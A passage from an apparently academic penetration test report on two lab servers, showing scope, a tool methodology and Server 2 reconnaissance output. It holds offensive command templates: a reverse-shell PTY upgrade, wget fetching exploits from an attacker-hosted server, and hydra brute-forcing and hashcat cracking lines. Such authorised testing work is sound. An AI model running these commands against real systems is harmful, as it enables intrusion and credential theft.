

Ethical Hacking and Countermeasures

010 Element Case Study and Analysis Report

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Submission Checklist

Section	Subsection	YES	NO
Title		Yes	
Table of Contents		Yes	
List of Tables		Yes	
List of Figures		Yes	
Executive Summary		Yes	
Introduction		Yes	
Methodology and Justification for Tool Selection		Yes	
First Server	Depth of understanding gleaned from footprinting and vulnerabilities detected	Yes	
	Relevance of security issues found	Yes	
	The exploitation of vulnerabilities found & backdoors potentially used	Yes	
	Research into possible exploit mitigation & recommendations	Yes	
Second Server	Depth of understanding gleaned from footprinting and vulnerabilities detected	Yes	
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	The exploitation of vulnerabilities found & backdoors potentially used	Yes	
	Research into possible exploit mitigation & recommendations	Yes	
Conclusion		Yes	
Reflection		Yes	
References		Yes	
Appendices			N/A

Contents

1	List of Tables	4
2	List of Figures	5
3	Executive Summary	7
4	Introduction	7
5	Methodology and Justification for Tool Selection	8
6	First Server	14
6.1	Depth of understanding gleaned from footprinting and vulnerabilities detected .	14
6.1.1	Summary of Findings	24
6.1.2	Vulnerabilities Summary	25
6.2	Relevance of security issues found	25
6.3	The exploitation of vulnerabilities found & backdoors potentially used	30
6.4	Research into possible exploit mitigation & recommendations	33
7	Second Server	37
7.1	Depth of understanding gleaned from footprinting and vulnerabilities detected .	37
7.1.1	Summary of Findings	46
7.1.2	Vulnerabilities Summary	47
7.2	Relevance of security issues found	48
7.3	The exploitation of vulnerabilities found & backdoors potentially used	50
7.4	Research into possible exploit mitigation & recommendations	53
8	Conclusion	56
9	Reflection	57
10	References	59
11	Self-Assessment	62

1 List of Tables

1	Tools Used in Each Methodology Phase	8
2	Server 2 – Summary of Reconnaissance Findings	24
3	Summary of Identified Vulnerabilities	25
4	Vulnerabilities	26
4	CVSS-Based Risk Assessment of Identified Vulnerabilities on Server 2 – Ordered By Risk (desc.)	29
5	Server 7 – Summary of Reconnaissance Findings	46
6	Summary of Identified Vulnerabilities on Server 7	47
7	Vulnerabilities	48
7	CVSS-Based Risk Assessment of Identified Vulnerabilities on Server 7 – Ordered By Risk (desc.)	50

2 List of Figures

1	Penetration testing methodology that was followed	8
2	Result of ip route show command	14
3	Result of nmap -sn command	14
4	Result of nmap -O command	15
5	Result of nmap -T4 -n -open and -sS -p- command on server 2	15
6	Output of 'light' and default nmap version scan on server 2	16
7	Output of nmap banner script and banner grabs on port 80	17
8	Output of banner grabs on port 8080 and 9000	17
9	RPC service mapping for server 2	18
10	'Sensible Furniture' website located at port 8080	18
11	Output of nmap vulnerability scan on port 8080	19
12	Unsecured Administrator Panel of the Sensible Furniture website	19
13	Contact form of the Sensible Furniture website	20
14	Registration form of the Sensible Furniture website	20
15	Add New Item form of the Sensible Furniture website	21
16	Sign in form of the Sensible Furniture website	21
17	User access form of the Sensible Furniture website	21
18	'GitList' website located at port 9000	22
19	Default Apache page located at port 80	22
20	Output of Nikto scan on port 8080 ('Sensible Furniture')	23
21	Output of Nikto scan on port 9000 ('GitList')	23
22	Setup and execution of GitList argument injection exploit and establishment of shell access	30
23	Contents of Dirty COW exploit with execution instructions	31
24	Setup of HTTP server on attacker machine to host exploitdb folder	31
25	Upgrading of remote shell and downloading of Dirty COW exploit on server 2	32
26	Compilation and execution of Dirty COW exploit on server 2	32
27	Successful exploitation of Dirty COW exploit and evidence of root-level access	33
28	Result of nmap -sn command	37
29	Result of nmap -O command	37
30	Open ports on server 7	38
31	Version information for open ports on server 7	38
32	SSH banner grab on server 7	39
33	RPC service mapping for server 7	39
34	nmap vulnerability scan on server 7	40
35	Result of nmap Samba scripts	40
36	Enumeration of Samba shares on server 7	41
37	Public Samba share being connected and uploaded to	41
38	Establishing a manual symlink and viewing the contents of server 7's /etc/ directory	42
39	Downloading a file from the /etc/ directory of server 7 using the manually established symlink	42
40	Contents of server 7's Samba configuration file - part 1	43
41	Contents of server 7's Samba configuration file - part 2	43
42	Result of nmap ssh2-enum-algos script and examination of server 7's cryptographic algorithms - part 1	44

43	Result of nmap ssh2-enum-algos script and examination of server 7's cryptographic algorithms - part 2	44
44	Result of ssh-keyscan command and unauthenticated disclosure of server 7's host SSH keys	45
45	Contents of server 2's shadow file containing the root user's password hash . .	51
46	Cracking of server 2's root user's password hash using hashcat - part 1	51
47	Cracking of server 2's root user's password hash using hashcat - part 2	52
48	Successful SSH connection of server 7 using root user credentials acquired from server 2	52
49	Successful Hydra brute force of server 7	53

3 Executive Summary

A penetration test was conducted on behalf of Ruskin Investment Bank Ltd. The goal of this test was to evaluate and exploit potential vulnerabilities on two assigned servers from Ruskin Investment Bank's network topology, and identify any possible weaknesses needing to be addressed. The test was performed without any prior knowledge or context, otherwise referred to as a black-box penetration test. Both servers had numerous outdated software packages and operating systems. Server 2's vulnerable web application served as an entry point to admin account access through its underlying operating system, with Server 7's administrator account being infiltrated due to reused credentials. Multiple other vulnerabilities were identified that have impacts across confidentiality, integrity, and availability. Ruskin Investment Bank's overall security posture is that both servers investigated are critically vulnerable and exposed, with total compromise being achieved.

4 Introduction

Penetration testing is a simulated attack performed by an authorised ethical hacker. The outcome of a penetration test is to uncover security oversight and flaws in an organisation's infrastructure, rather than to create harm (CREST, 2022). This penetration test is being carried out to evaluate the security posture of Ruskin Investment Bank's infrastructure, and aims to identify vulnerabilities that could pose risks to their operations. Key objectives include the discovery of weaknesses through comprehensive footprinting, reconnaissance and enumeration stages, investigating identified vulnerabilities, and assessing their risks.

The key stages of the penetration test were conducted within the date ranges below:

- **7-17th October 2025:** Server 2 Footprinting, reconnaissance, network scanning & enumeration
- **2-14th November 2025:** Server 2 Vulnerability analysis and exploitation
- **12-21st November 2025:** Server 7 Footprinting, reconnaissance, network scanning & enumeration
- **24-28th November 2025:** Server 7 Vulnerability analysis and exploitation

This assessment was exclusively limited to the servers below:

- Server 2 (IP: 192.168.9.130)
- Server 7 (IP: 192.168.9.128)

Other servers on the network were not directly interacted with, and only briefly feature within some scanning activity during the initial topology discovery stage.

5 Methodology and Justification for Tool Selection

Penetration Testing Methodology

The first stage of the penetration testing methodology is planning, where the scope and constraints of the test are recognised. This is followed by reconnaissance, which aims to identify the hosts and any exposed services or data. The next stage is scanning, which enumerates open ports and determines any service versions. Moving deeper, the enumeration phase gathers more detailed service information, which may uncover configuration weaknesses. Next, vulnerabilities identified in previous phases are analysed to establish a viable exploitation plan. This leads onto the exploitation phase itself, which leverages the exploitation plan in an attempt to gain root access over the system. Following this, the post exploitation phase aims to gain deeper access using the prior successful exploitation stage. Forming the last stage of the methodology, the reporting phase summarises all findings and provides practical mitigation steps.

Figure 1: Penetration testing methodology that was followed

The below table summarises the tools that were used in each phase of the methodology. Afterwards, a detailed description of each tool is provided, and justification for their use is given.

Table 1: Tools Used in Each Methodology Phase

Methodology Phase	Tools Used
Planning	None
Reconnaissance	ip, nmap -sn, ssh-keyscan, rpcinfo , Firefox, nmap scripts: smb-os-discovery, smb-protocols, ssh2-enum-algos
Scanning	nmap -sS, nmap -p-, nmap -sV, nmap --version-light, nmap --open, nc
Enumeration	smbclient, nikto , Firefox, Further nmap service/version scans
Vulnerability Analysis	searchsploit, nmap --script=vuln, nikto, nc, smbclient
Exploitation	Metasploit (msfconsole), gcc , Python PTY upgrade, Python HTTP server, wget, hydra, ssh, hashcat
Post-Exploitation	ssh , Python PTY, wget, gcc
Reporting	None

Tool Descriptions and Justifications

ip Command

The **ip** command was used during initial determination of the subnet and subnet mask. It was chosen as it shows the subnet prefix directly, as opposed to other commands, which require conversion of dotted decimal notation (Klassert et al., 2023).

ip route show - Displays the routing table, which was used to identify subnet mask (Klassert et al., 2023).

nmap Command

nmap is a network mapping tool that has a number of purposes. These include scanning for open ports, discovering hosts, detecting application versions. The command was used throughout the footprinting, scanning, enumeration and vulnerability discovery stages. It was chosen over other available tools, such as masscan, because of its wider breadth of features with straightforward parameter selection (Nmap Project, 2020b).

nmap -sn <subnet>/<mask> - Discover all active hosts on the subnet with a ICMP ping. The **-sn** parameter disables the port scan, to only return the available hosts (Nmap Project, 2020a).

nmap -T4 -n --open <ip> - Find open ports for each server (Top 1000). The **-T** parameter adjusts the rate at which the scan is performed, with 4 denoting 'aggressive' timing. The **-n** parameter skips DNS resolution, improving the speed of the scan, and **--open** controls the output, only displaying open ports (Nmap Project, 2020g).

nmap -sS -p- -T4 -n --open <ip> - Find open ports for each server (All 65535). This command differs with the addition of 2 parameters. As opposed to just the top-1000 ports in the previous query, the **-p-** parameter performs a scan of all 65,535 TCP ports (1-65535). The **-sS** parameter instructs nmap to perform a "stealth scan", which sends a "half-open" scan as opposed to a full 3-way handshake (Nmap Project, 2020d).

nmap -sS -sV --version-light -p <port1>,<port2> -T4 -n <ip> - Find detailed information about ports including application version, with reason (Light). As before, **-sS** performs a stealth scan, and **-sV** determines the service and version about each port. This is initially run with the **--version-light** flag, which limits the scan to the most likely probes (Lyon, 2025). As before, DNS resolution is skipped, and the scan rate is set to 4.

nmap -sS -sV -p <port1>,<port2> -T4 -n <ip> - Find detailed information about ports including application version, with reason (Full). This differs from the previous command by omitting the **--version-light** flag, scanning with higher intensity and increasing the chances of identifying all services (Lyon, 2025).

nmap -O <ip> - Remote OS detection scan through TCP/IP stack fingerprinting. Using a database of over 2,600 known OS fingerprints, responses to the scan's TCP/UDP packets are compared and matched against known operating systems (Nmap Project, 2020c).

nmap --script=vuln -p <port> -n <ip> - Targeted vulnerability scan using scripts in nmap's 'vuln' category. Around 60-70 scripts are run in an attempt to identify known vulnerabilities against the detected services (Nmap Project, 2020h).

nmap --script smb-os-discovery,smb-protocols,smb-security-mode <ip> - SMB-focussed nmap scripts that enumerate details on the Samba configuration of the target system. Some of

the information retrieved includes supported SMB protocols, server type, OS version, and SMB authentication settings (Nmap Project, 2020e).

nmap -p<port> --script ssh2-enum-algos <ip> - Passive enumeration script to enumerate the SSH service and its supported cryptographic algorithms. It works by connecting to the SSH service and retrieving supported algorithms used for key exchange, host key generation, encryption, and MAC algorithms (Nmap Project, 2020f).

Netcat/nc Command

Netcat is a lightweight command line tool that is used for many low level networking functions. An advantage of netcat is that it is very quick and can be operated using very minimal syntax. In addition, rather than some alternative tools that feature a lot of automation, netcat allows for manual, granular control to send and receive data. This allows for inspection of how a service responds without any additional noise from more intense scans (Hobbit / Netcat Project, 2004).

nc <ip> <port> -w 3 - Banner grab of the target IP and port. A TCP connection is attempted to check whether the port is open, closed or filtered. Allowing for up to a 3-second timeout, if the port is open a greeting message (banner) will appear. The result of which is that the targeted service can be verified as being active, and version information may be revealed (Hobbit / Netcat Project, 2004).

rpcinfo Command

rpcinfo is used to query the Remote Procedure Call (RPC) service, allowing for enumeration of all RPC programs registered with rpcbind. As opposed to other tools, **rpcinfo** is more precise as it directly queries rpcbind, rather than relying on broader, more basic probes (Open Group / Linux man-pages Project, 2024).

rpcinfo -p <ip> - Returns a list of RPC programs registered on a target host. Shown in the results are assigned port numbers, transport protocols and service names, which can expose potential vulnerabilities (Open Group / Linux man-pages Project, 2024).

Exploit-DB/searchsploit Command

Exploit-DB is a community driven database of exploits, maintained by Offensive Security. It contains thousands of exploits against operating systems, networking services, software and web applications. The queryable database is mirrored locally inside Kali Linux, allowing for use in isolated penetration testing environments and air gapped networks (Offensive Security, 2024a).

searchsploit <query> - Searches the local Exploit-DB database for exploits matching the query. Matching exploits can then be examined or downloaded for further use. Due to the well-maintained structuring of the database, it is much quicker than perusing the filesystem manually, as it matches against exploit titles, software names, CVE IDs, versions and author names (Offensive Security, 2024b).

Mozilla Firefox

Firefox is an open source web browser created by Mozilla. Based on a privacy-focussed design, it is an appropriate choice for penetration testing. Tasks completed within this investigation include manual browsing of targeted elements of the web applications and exposed directories highlighted during earlier scans, such as the Sensible Furniture website on Server

2. Browsing visually has some advantages over interpreting a HTML response from a curl command, such as quicker and easier human interpretation.

nikto Command

Nikto is a web vulnerability scanning tool that searches for known security issues in web applications. Advantages of Nikto over similar tools is the breadth of its tests, encompassing thousands of common misconfigurations and known vulnerabilities in a single scan. Results of the nikto scan can reveal high level information that deeper tools can further investigate (Sullo, 2020).

nikto -h <url:port> - Run a full nikto scan against the specified host. By sending HTTP requests, the server version is checked against a library of known vulnerabilities. The list of checks includes the presence of default files, old backups, insecure HTTP methods and common CVEs (Sullo, 2020).

Metasploit/msfconsole Command

Metasploit is a framework used for penetration testing, allowing for development, testing and execution of ready-made exploits against target systems. It differs from similarly appearing solutions like Exploit-DB/searchsploit by being able to actually attack systems using its modules, as opposed to only allowing for browsing of a PoC (proof of concept) database. In addition, Metasploit automatically handles selected payloads including meterpreter sessions and reverse shells, allowing for exploited sessions to be managed as well. An industry-standard tool, it is particularly effective due to it's well maintained library of thousands of reliable exploit modules (Offensive Security, 2024c).

GNU Compiler Collection (gcc)

The GNU Compiler Collection (GCC) is an open source compiler system that supports C, C++, amongst other languages. Its primary purpose in this penetration test is to compile Exploit-DB PoCs, usually provided as raw .c files, which was used to compile the Dirty COW exploit used for privilege escalation on Server 2. GCC is a widely tested and mature compiler that ensures predictable output, improving the reliability of compiled exploits and increasing the chances of success (Free Software Foundation, 2024a).

gcc -pthread <input> -o <output> -lcrypt - Compile C source code, using the libcrypt library, and with POSIX threads support. These were the specified parameters required to compile the Dirty COW exploit in Section 6.3, which enables password hashing and multi-threaded operation in the output file. POSIX threads support enables multiple threads to operate simultaneously (Linux man-pages Project, 2024b), allowing the race condition to work effectively. Due to the exploit creating a new password, the inclusion of the libcrypt library allows for generation of valid UNIX password hashes upon successful exploitation (Linux man-pages Project, 2024a).

Python

Python is a popular and feature-rich programming language that can be utilised for many purposes within penetration testing. A key advantage over more basic tools like Bash/Linux command line is that it has many powerful libraries built in to the language, without requiring other tools or compilation (Python Software Foundation, 2024a).

python -c 'import pty; pty.spawn("/bin/bash")' - Upgrades a basic reverse shell into

a stable, interactive pseudo-terminal. The advantage of this is that upon successful exploitation and returning of a basic reverse shell, it can be enhanced with more stable terminal behaviour, which can then be used to more reliably exploit the system further (Python Software Foundation, 2024c).

python3 -m http.server 8000 - Launches a HTTP server from the current working directory on port 8000. This allows for exploit files from the attacker machine to be transferred to a compromised host over HTTP. Python's built in HTTP server features rapid deployment and no setup or further configuration to work (Python Software Foundation, 2024b).

wget Command

wget is a command line tool used to download files from a remote host. It works in conjunction with the Python HTTP server to retrieve files from the established directory. It's key advantage is reliable and predictable retrieval of files with minimal syntax (Free Software Foundation, 2024b).

wget <url:port>/<path-to-file> - Downloads a file from the specified location to the current working directory of the target system. During the exploitation stage of server 2, it enabled for retrieval of further exploit files from the attacker host. This allowed for advanced exploits to be moved between machines, increasing the complexity of files that would otherwise have to be manually inputted (Free Software Foundation, 2024b).

Samba Client (smbclient)

smbclient is a command line tool that allows for interaction with Windows and Samba file shares. Whilst there are other tools that can scan and enumerate these shares, **smbclient** allows for direct interaction with the resources, providing file retrieval capabilities and listing of a directory's content (Samba Team, 2024).

smbclient -L //<ip> -N --option="client min protocol=NT1" - Anonymously connects to and lists the available shares on the target host. The SMB1 protocol is forced, allowing for connection with older Samba configurations. This command is valuable for enumerating the available shares, providing targets for further probing (Samba Team, 2024).

smbclient -L //<ip>/<share> -N --option="client min protocol=NT1" -c "<command-1>;<command-2>" - Connects to a specific share and executes one or more commands. This allows for scripts and commands to be executed against the target share without fully entering an interactive shell session. By stringing together multiple commands, more invasive actions can be executed, revealing more sensitive files or exposing possible misconfigurations (Samba Team, 2024).

ssh-keyscan Command

ssh-keyscan is used to retrieve public SSH host keys from a remote system without initiating a full SSH connection. It is a valuable tool in reconnaissance as it allows for non-interactive collection of the target server's host key, without requiring credentials (OpenSSH Project, 2024a). **ssh-keyscan** was used to investigate outdated host key algorithms being used by Server 7's SSH service.

ssh-keyscan -p <port> <ip> - Queries the SSH service running on the target IP and port, returning its public host keys. The returned keys can be used to identify potential weaknesses or outdated algorithms (OpenSSH Project, 2024a).

hashcat Command

Hashcat is a password cracking tool that supports many attack modes and hash types. A benefit of hashcat is that it is optimised for both CPU and GPU acceleration, offering high performance regardless of the available attacker systems hardware configuration (Hashcat Project, 2024).

hashcat -m 1800 <hash-file> <wordlist> - Attempts to crack a target bcrypt (as indicated with the **hashcat -m 1800** parameter) hashed password using values from a provided wordlist. If successful, the result of the command is the corresponding plaintext password corresponding to the hash. Once the credential is compromised, this can allow for direct authenticated access to the target system (Hashcat Project, 2024).

ssh Command

Secure shell (SSH) is a networking protocol that allows for secure access to a system over an encrypted connection. Using valid credentials, a session can be established that allows for full terminal access. If successfully authenticated, it allows for post exploitation actions to be carried out on the connected system (OpenSSH Project, 2024b).

ssh <username>@<ip> - Establishes an encrypted remote session with the target IP address, using the provided username. Once connected, the password for the specified user is requested and upon valid entry, an interactive shell is opened. Depending on the privilege level of the target user, this allows for various commands to be executed at will (OpenSSH Project, 2024b).

hydra Command

Hydra is a brute-forcing tool that can be used to rapidly test a list of provided username and password pairs, in an attempt to gain valid credentials. Many protocols are supported, making it a sensible choice to use, regardless of the intended target (vanhauser-thc, 2024).

hydra -l <username> -P <password-list> <ip> ssh -t 4 -f - Attempts to brute force the SSH service of the target IP using a single provided username and file containing a list of passwords. The **-t 4** parameter allows for 4 threads to run in parallel, improving speed whilst not overwhelming the target system. The **-f** parameter stops the operation as soon as a valid password is found, which is the intended behaviour when only a single username is being attacked (vanhauser-thc, 2024).

6 First Server

6.1 Depth of understanding gleaned from footprinting and vulnerabilities detected

First, the footprinting process began by discovering the address of the subnet, using the `ip route show` command, indicating that the `eth0` interface was within the `192.168.9.0/24` subnet. The purpose of running this initial scan was to gain an overview of the network and ensure that further steps remained within scope.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# ip route show
default via 192.168.9.1 dev eth0 proto static metric 100
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
192.168.9.0/24 dev eth0 proto kernel scope link src 192.168.9.2 metric 100
root@kali:~# █
```

Figure 2: Result of `ip route show` command

Now, other devices operating on this subnet, and their IP addresses, can be discovered using the `nmap` command. The results of this scan are shown below and show that server 2 (192.168.9.130) is live, whilst also revealing the MAC address of server 2 as `00:50:56:BE:78:2D`. It also provides information about the rest of the active devices on the topology and checks the target is reachable, prior to running further scans.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sn 192.168.9.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:29 EDT
Nmap scan report for 192.168.9.1
Host is up (0.00075s latency).
MAC Address: 00:50:56:9A:63:AC (VMware)
Nmap scan report for 192.168.9.128
Host is up (0.00019s latency).
MAC Address: 00:50:56:BE:78:2D (VMware)
Nmap scan report for 192.168.9.129
Host is up (0.00016s latency).
MAC Address: 00:50:56:BE:0C:03 (VMware)
Nmap scan report for 192.168.9.130
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:85:15 (VMware)
Nmap scan report for 192.168.9.131
Host is up (0.00015s latency).
MAC Address: 00:50:56:B0:C6:BC (VMware)
Nmap scan report for 192.168.9.132
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:E0:BD (VMware)
Nmap scan report for 192.168.9.133
Host is up (0.00018s latency).
MAC Address: 00:50:56:BE:17:E6 (VMware)
Nmap scan report for 192.168.9.134
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:1D:77 (VMware)
Nmap scan report for 192.168.9.135
Host is up (0.00016s latency).
MAC Address: 00:50:56:BE:23:1B (VMware)
Nmap scan report for 192.168.9.2
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 1.91 seconds
root@kali:~# █
```

Figure 3: Result of `nmap -sn` command

The operating system can be determined using the **nmap** command. Seen below, the results indicate the version as Linux 3.2-3.16. This baseline OS knowledge influences further vulnerability analysis and helps to determine feasible exploits.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -O 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-12-01 13:16 EST
Nmap scan report for 192.168.9.130
Host is up (0.000082s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
8080/tcp   open  http-proxy
9000/tcp   open  cslistener
MAC Address: 00:50:56:BE:85:15 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds
root@kali:~#

```

Figure 4: Result of nmap -O command

Next, from the IP address of server 2 it is possible to scan for open ports. The figure below shows that the ports 22, 80, 111, 8080 and 9000 are open, with the more comprehensive scan returning the additional 45301 port. In addition to the open ports, a descriptor of the service is also shown: ssh, http, rpcbind, http-proxy and cslistener, respectively.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -T4 -n --open 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:31 EDT
Nmap scan report for 192.168.9.130
Host is up (0.000036s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
8080/tcp   open  http-proxy
9000/tcp   open  cslistener
MAC Address: 00:50:56:BE:85:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
root@kali:~# nmap -sS -p- -T4 -n --open 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:31 EDT
Nmap scan report for 192.168.9.130
Host is up (0.000076s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
8080/tcp   open  http-proxy
9000/tcp   open  cslistener
45301/tcp open  unknown
MAC Address: 00:50:56:BE:85:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
root@kali:~#

```

Figure 5: Result of nmap -T4 -n --open and -sS -p- command on server 2

These listed services can be further prised for more information, including their version. As shown in the results below, the light scan identifies the OpenSSH and Apache versions running on server 2 as 6.0p1 and 2.2.22, respectively. The second scan also returns some additional version information for the **rpcbind** and **status** services. Both scans serve their own purpose; the light scan provides quick, confident results, whilst the full scan probes deeper and reveals additional details on some services. These scans also reveal the operating system,

which is identified as Linux. Both the OpenSSH and Apache versions are extremely outdated, having both been declared EOL in the late 2010's (OpenSSH Project, 2012; Apache Software Foundation, 2017).

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sS -sV --version-light -reason -p 22,80,111,8080,9000,45301 -T4 -n 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:35 EDT
Nmap scan report for 192.168.9.130
Host is up, received arp-response (0.00016s latency).

PORT      STATE SERVICE REASON          VERSION
22/tcp    open  ssh      syn-ack ttl 64   OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
80/tcp    open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind  syn-ack ttl 64
8080/tcp  open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
9000/tcp  open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
45301/tcp open  unknown  syn-ack ttl 64
MAC Address: 00:50:56:BE:85:15 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds
root@kali:~# nmap -sS -sV -reason -p 22,80,111,8080,9000,45301 -T4 -n 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:36 EDT
Nmap scan report for 192.168.9.130
Host is up, received arp-response (0.00040s latency).

PORT      STATE SERVICE REASON          VERSION
22/tcp    open  ssh      syn-ack ttl 64   OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
80/tcp    open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind  syn-ack ttl 64   2-4 (RPC #100000)
8080/tcp  open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
9000/tcp  open  http     syn-ack ttl 64   Apache httpd 2.2.22 ((Debian))
45301/tcp open  status  syn-ack ttl 64   1 (RPC #100024)
MAC Address: 00:50:56:BE:85:15 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
root@kali:~# █

```

Figure 6: Output of 'light' and default nmap version scan on server 2

Some of the versions can be affirmed using banner grabs against each of the open ports. **nmap** is used once again to run the banner script (**--script=banner**), which returns the same version information as before on the SSH service. This can be tested a third time using the **nc** command against port 22. The same is carried out for the HTTP ports (80, 8080, 9000), which reveal the Apache 2.2.22 version as before. Using two methods of banner grabbing reduces reliance on one tool, providing more thoroughly validated results. The results of the banner grabs are shown in the figures below.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sS -p 22,80,111,8080,9000,45301 --script=banner -n -T4 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:44 EDT
Nmap scan report for 192.168.9.130
Host is up (0.00039s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
|_ banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
80/tcp    open  http
111/tcp    open  rpcbind
8080/tcp   open  http-proxy
9000/tcp   open  cslistener
45301/tcp  open  unknown
MAC Address: 00:50:56:BE:85:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds
root@kali:~# nc 192.168.9.130 22 -w 3
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3

Protocol mismatch.
root@kali:~# nc 192.168.9.130 80 -w 3

HTTP/1.1 400 Bad Request
Date: Fri, 17 Oct 2025 15:45:13 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at localhost.computing.anglia.ac.uk Port 80</address>
</body></html>
root@kali:~#

```

Figure 7: Output of nmap banner script and banner grabs on port 80

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nc 192.168.9.130 8080 -w 3

HTTP/1.1 400 Bad Request
Date: Fri, 17 Oct 2025 15:45:56 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
root@kali:~# nc 192.168.9.130 9000 -w 3

HTTP/1.1 400 Bad Request
Date: Fri, 17 Oct 2025 15:46:02 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
root@kali:~#

```

Figure 8: Output of banner grabs on port 8080 and 9000

To continue, the Remote Procedure Call (RPC) service was queried to investigate further details on the system. Using the **rpcinfo** command, the port mappings are revealed. The purpose of enumerating the RPC service is to identify other non-HTTP services, aiming to expand the attack surface. It shows that port 111 is assigned to the **portmapper** service, with port 45301 found earlier showing as belonging to the **status** service. The results of this query are shown below.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# rpcinfo -p 192.168.9.130
program vers proto  port  service
100000    4    tcp    111   portmapper
100000    3    tcp    111   portmapper
100000    2    tcp    111   portmapper
100000    4    udp    111   portmapper
100000    3    udp    111   portmapper
100000    2    udp    111   portmapper
100024    1    udp    58951 status
100024    1    tcp    45301 status
root@kali:~#

```

Figure 9: RPC service mapping for server 2

Using knowledge of the Apache web server running on port 8080, this can be examined manually using a web browser and navigating to **http://192.168.9.130:8080**. Use of the automated scans above cannot interpret the behaviour and functionality of a web application in the same way manual browsing can. The results of navigating to the target URL returns the furniture website below.

Figure 10: 'Sensible Furniture' website located at port 8080

To further investigate the structure of the furniture website, an nmap vulnerability scan is run. The results below indicate vital exposed endpoints at `/admin/`, `/admin/index.php`, `/admin/upload.php` and `/robots.txt`, with the remainder of the script identifying directory listed directories `/css/`, `/icons/`, `/img/` and `/js/`. These directories were not visible through manual browsing, highlighting the need for an automated scan here.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap --script=vuln -p 8080 -n 192.168.9.130
Starting Nmap 7.80 ( https://nmap.org ) at 2025-11-15 06:11 EST
Nmap scan report for 192.168.9.130
Host is up (0.00026s latency).

PORT      STATE SERVICE
8080/tcp  open  http-proxy
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-cookie-flags:
|_/:
|_  PHPSESSID:
|_    httponly flag not set
|_ /admin/:
|_  PHPSESSID:
|_    httponly flag not set
|_ /admin/index.php:
|_  PHPSESSID:
|_    httponly flag not set
|_ /admin/upload.php:
|_  PHPSESSID:
|_    httponly flag not set
|_http-enum:
|_ /admin/: Possible admin folder
|_ /admin/index.php: Possible admin folder
|_ /robots.txt: Robots file
|_ /admin/upload.php: Admin File Upload
|_ /css/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
|_ /img/: Potentially interesting folder w/ directory listing
|_ /js/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
